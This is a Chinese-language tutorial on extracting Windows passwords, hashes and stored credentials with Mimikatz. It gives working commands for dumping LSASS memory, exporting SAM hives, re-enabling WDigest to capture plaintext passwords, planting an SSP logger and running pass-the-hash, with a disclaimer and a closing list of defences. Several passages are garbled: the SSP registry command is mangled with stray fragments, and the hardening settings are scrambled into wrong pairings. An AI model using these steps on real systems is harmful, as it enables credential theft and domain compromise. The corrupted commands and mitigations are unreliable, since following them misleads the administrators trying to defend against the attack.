使用 Mimikatz 从 Windows 内存中转储用户密码

在这篇文章中，我们将学习一种非常简单的方法，使用 Mimikatz 工具获取所有活动 Windows 用户的密码。这篇文章是 Windows 安全系列文章的一部分。

Mimikatz.exe

可以从 Windows 内存中提取纯文本密码、密码哈希、Kerberos 票证等。此外，mimikatz 还允许您执行哈希传递、票证传递攻击或生成黄金 Kerberos 票证。 Metasploit 框架中也提供了 mimikatz 功能。

您可以从 GitHub 存储库下载 mimikatz：https://github.com/gentilkiwi/mimikatz/releases/。将 mimikatz_trunk.zip 存档解压到 C:\Tools\mimikatz。此目录中将出现两个版本的 mimikatz - 用于 x64 和 x86。使用适合您的 Windows 位数的版本。

在本文中，我们将向您展示如何使用 mimikatz 在 Windows Server 2016 或 Windows 10 中获取用户密码。

免责声明。 本文中描述的信息和技术仅供参考，不得用于访问第三方的帐户、数据和系统。

使用 Mimikatz 破解 LSASS 中的 Windows 哈希密码

让我们尝试在运行 Windows Server 2016 的 RDS 服务器上从 Windows 内存（lsass.exe 进程 - 本地安全机构子系统服务）转储所有登录用户的密码哈希值。

在提升的命令提示符中运行以下命令：

1. 跑步

   Mimikatz.exe

   作为管理员；

2. 以下命令将授予当前帐户调试进程的权限（SeDebugPrivilege）：

   privilege::debug

3. 列出活动用户会话：

    sekurlsa::logonPasswords full

4. 就我而言，除了我的帐户之外，服务器上还有两个用户的活动会话：

   novach

   和

   administrator

   。

5. 复制他们的 NTLM 哈希值（在屏幕截图中突出显示）。
   

   

您可以不以交互方式使用 mimikatz，而是以命令模式使用。要自动获取用户密码哈希值并导出到文本文件，请使用以下命令：

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt

现在您可以使用任何离线（有一个

hashcat

Kali Linux 中的工具）或用于解密 NTLM 哈希的在线服务。我将使用服务 https://crackstation.net/。

正如您所看到的，该服务很快找到了这些 NTLM 哈希值。我们收到了明文形式的用户密码。

假设这是一个具有许多并发用户和企业管理员会话的 RDS 主机。如果您在此服务器上具有本地管理员权限，您甚至可以获得域管理员密码。

如果您对 Windows 用户使用复杂的密码，解密它们将会困难得多。因此，请始终通过 GPO 启用密码复杂性，并定期审核 AD 域中的密码强度。

如您所见，感谢 mimikatz，我们获得了所有活跃用户的 NTLM 哈希值！该命令成功，因为此计算机上启用了调试模式，这允许您为所需进程设置 SeDebugPrivilege 标志。在此模式下，程序可以对代表系统启动的进程的内存进行低级访问。

注意。 2017 年 6 月，多个国家的多家大公司感染了 NotPetya 勒索软件，该勒索软件利用内置的 mimikatz 模块收集用户和域管理员的密码。

如何从 Windows 内存转储中获取用户密码？

如果安装了阻止注入的防病毒软件，则上述获取密码哈希值的方法将不起作用。在这种情况下，必须在目标主机上创建 LSASS 进程的内存转储，将其复制到您的计算机并使用 mimikatz 提取密码哈希值。

在 Windows 中创建进程的内存转储非常容易。启动任务管理器，找到 lsass.exe 进程，右键单击它并选择创建转储文件。

Windows 会将内存转储保存到 system32 文件夹中。

您只需使用 mimikatz 解析转储文件（您可以在另一台计算机上执行此任务）。将内存转储加载到 mimikatz 中：

Mimikatz “sekurlsa::minidump C:\Users\username\AppData\Local\Temp\lsass.DMP”

从转储中获取用户名及其密码哈希值：

# sekurlsa::logonPasswords

您可以使用 psexec 或通过 WinRM（如果您具有管理员权限）从远程计算机获取内存转储，并从中提取用户的密码。

您还可以使用

procdump

Sysinternals 提供的工具来获取转储：

procdump -ma lsass.exe lsass.dmp

LSASS进程的内存转储可以通过PowerShell中的Out-Minidump.ps1函数获得。将 Out-Minidump 函数导入 PoSh 会话并创建 LSASS 进程的内存转储：

Import-Module .\OutMiniDump.ps1
Get-Process lsass | Out-Minidump

从 Hyberfil.sys 和 VM 页面文件中提取 Windows 密码

还可以从内存转储文件、系统休眠文件 (hiberfil.sys) 等中提取用户密码。虚拟机文件的 vmem（虚拟机分页文件及其快照）。

为此，您需要Windows 调试工具 (WinDbg)、mimikatz 本身和一个工具将.vmem 转换为内存转储文件（在Hyper-V 中，它可以是vm2dmp.exe 或MoonSols Windows Memory toolkit for VMWare vmem-files）。

例如，要将 VMWare 虚拟机的 vmem 页面文件转换为转储，请使用以下命令：

bin2dmp.exe "wsrv2008r2-1.vmem" vmware.dmp

将转储导入 WinDbg（文件 -> 打开故障转储），加载 mimikatz 库 mimilib.dll：

.load mimilib.dll

在转储中找到 lsass.exe 进程：

!process 0 0 lsass.exe

最后，输入：

.process /r /p fffffa800e0b3b30
!mimikatz

因此，您将获得 Windows 用户列表及其密码的 NTLM 哈希值，甚至是明文密码。

使用 WDigest 以明文形式提取 Windows 密码

您可以在旧版 Windows 版本上使用 WDigest 协议进行 HTTP 摘要身份验证。该协议的主要安全缺陷是它以明文形式将用户密码而不是哈希值存储在内存中。 Mimikatz 允许您从 LSASS.EXE 进程的内存中提取这些密码。

默认情况下，所有新版本的 Windows（包括 Windows 10 和 Windows Server 2016/2019）中都禁用 WDigest 协议。但并未完全去除。如果您在Windows中具有本地管理员权限，则可以启用WDiget协议，等待用户登录并窃取其密码。

在 Windows 上启用 Wdigest：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

刷新组策略设置：

gpupdate /force

等待用户使用mimikatz登录并获取密码（Windows 10上用户需要重新登录；Windows Server 2016上锁屏后解锁会话即可）：

privilege::debug
sekurlsa::wdigest

如您所见，wdigest 部分包含明文形式的用户密码：

从 SAM 中提取本地用户密码哈希值

使用 mimikatz，您可以从 SAM 中提取本地 Windows 用户（包括内置管理员帐户）的密码哈希值：

privilege::debug
token::elevate
lsadump::sam

您还可以从注册表 SAM 配置单元中提取 NTLM 哈希值。

1. 将 SYSTEM 和 SAM 注册表配置单元导出到文件：

   reg save hklm\sam c:\tmp\sam.hiv
   reg save hklm\security c:\tmp\sec.hiv

   

2. 然后使用 Mimikatz 转储密码哈希值：

   privilege::debug
   token::elevate
   lsadump::sam c:\tmp\sam.hiv c:\tmp\sec.hiv

通过 Mimikatz 执行哈希传递攻击

如果用户拥有强密码且无法快速解密 NTLM 哈希，则可以使用 Mimikatz 执行哈希传递（哈希重用）攻击。在这种情况下，哈希可用于代表目标用户运行进程。例如，如果转储用户密码的 NTLM 哈希，以下命令将在该帐户下运行命令提示符：

privilege::debug
sekurlsa::pth /user:Administrator /domain:a-d /ntlm:e91ccf23eeeee21a12b6709de24aa42 /run:powershell.exe

此外，您还可以使用

Invoke-TheHash

工具，以便重新使用 NTLM 凭据在远程通勤者上执行命令。

从 Windows 凭据管理器转储密码

在 Windows 中，您可以在 Windows 凭据管理器中保存密码（这些密码可以是用于访问远程计算机、网站、RDP 凭据的密码）

TERMSRV/hostname1

格式）。 Mimikatz 可以从凭证管理器中提取这些密码并向您显示：

privilege::debug
sekurlsa::credman

如您所见，保存的密码显示在 credman 部分下。

Windows 自动登录密码以明文形式存储在注册表中。提取保存的 Wi-Fi 密码也很容易。

以明文形式转储 Windows 登录密码

在 Windows 中转储密码的另一种有趣方法是使用由 mimikatz 提供支持的附加 SSP 提供程序（安全支持提供程序）。

1. 将Mimikatz库文件mimilib.dll复制到文件夹C:\Windows\System32\；

2. 使用以下命令注册额外的 SPP 提供程序：

   reg add "hklm\system\currentcontrolset\control\lsa" /v "Security Packages" /d "kerberosGet-Content C:\Windows\System32\kiwissp.log<msv1_0
   保护 Windows 免受凭证转储攻击
   schannelKB2871997wdigestHKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigesttspkgUseLogonCredentialpku2u0 mimilib" /t REG_MULTI_SZ

3. 当每个用户登录 Windows 时，他们的密码将被写入 kiwissp.log 文件中。您可以使用 PowerShell 显示所有密码：
   

   使用可逆加密存储密码

   /里>

在 Windows 8.1 和 Windows Server 2012 R2（及更高版本）中，从 LSASS 窃取密码的能力受到限制。默认情况下，LM 哈希值和密码不会存储在这些 Windows 版本的内存中。

相同的功能向后移植到早期版本的 Windows (7/8/2008R2/2012)，其中您需要安装特殊更新 CachedLogonsCount（该更新提供其他选项来增强系统安全性），并在注册表项 交互式登录策略：要缓存的先前登录次数 中将 DWORD 参数 受保护用户 设置为 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 00000001 /f（WDigest 已禁用）。

如果您在安装此更新和 UseLogonCredential 密钥后尝试从内存中提取密码，您将看到 mimikatz 无法使用 creds_wdigest 命令转储密码和哈希值。

上面，我们展示了如果您具有本地管理员权限，您可以如何轻松地将此注册表项设置为易受攻击的值。之后，您可以再次访问LSA内存中的密码。

在 mimikatz 中，还有其他选项可以从内存中获取密码及其哈希值（WDigest、LM-hash、NTLM-hash、用于捕获 Kerberos 票证的模块）。因此建议实施以下安全措施进行保护：

• 防止使用可逆加密存储密码（在计算机配置 -> Windows 设置 -> 安全设置 -> 帐户策略 -> 密码策略部分中结论。 ，并将其值设置为禁用）；

• 禁用 WDigest：在同一注册表分支 (HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest) 中将 Negotiate 参数的值设置为 0；

• 防止在凭据管理器中保存密码：在计算机配置 -> Windows 设置 -> 安全设置 -> 本地策略 -> 安全选项中启用；

• 禁用NTLM和LM；

• 防止缓存域用户凭据（通过 注册表参数或组策略选项）；

• 如果域功能级别是 Windows Server 2012 R2 或更高版本，您可以将管理员帐户添加到特殊的组中。在这种情况下，不会为此类用户生成 NTLM 哈希值。

• 启用LSA进程内存保护：

  （此设置将仅允许 Microsoft 签名的进程访问 LSASS 内存，您可以通过 GPO 在域中部署此注册表项）；

• 使用Credential Guard保护进程的LSA内容；

• 即使本地管理员也无法获得调试权限：GPO -> Windows 设置 -> 安全设置 -> 本地策略 -> 用户权限分配 -> 调试程序（但是，如果您具有 LocalSystem 权限或类似的权限，这很容易被绕过）

我们再次提醒您一些关键的安全概念。

• 不要对不同的服务使用相同的密码（尤其是访问第三方拥有的 RDP/RDS 主机）；

• 考虑一下存储在云中虚拟机上的密码和数据的安全性，因为您无法确定还有谁可以访问虚拟机文件所在的虚拟机管理程序和存储；

• 最大限度地减少具有全局或本地管理员权限的帐户数量；

• 切勿使用域管理员帐户登录其他用户可访问的服务器和计算机。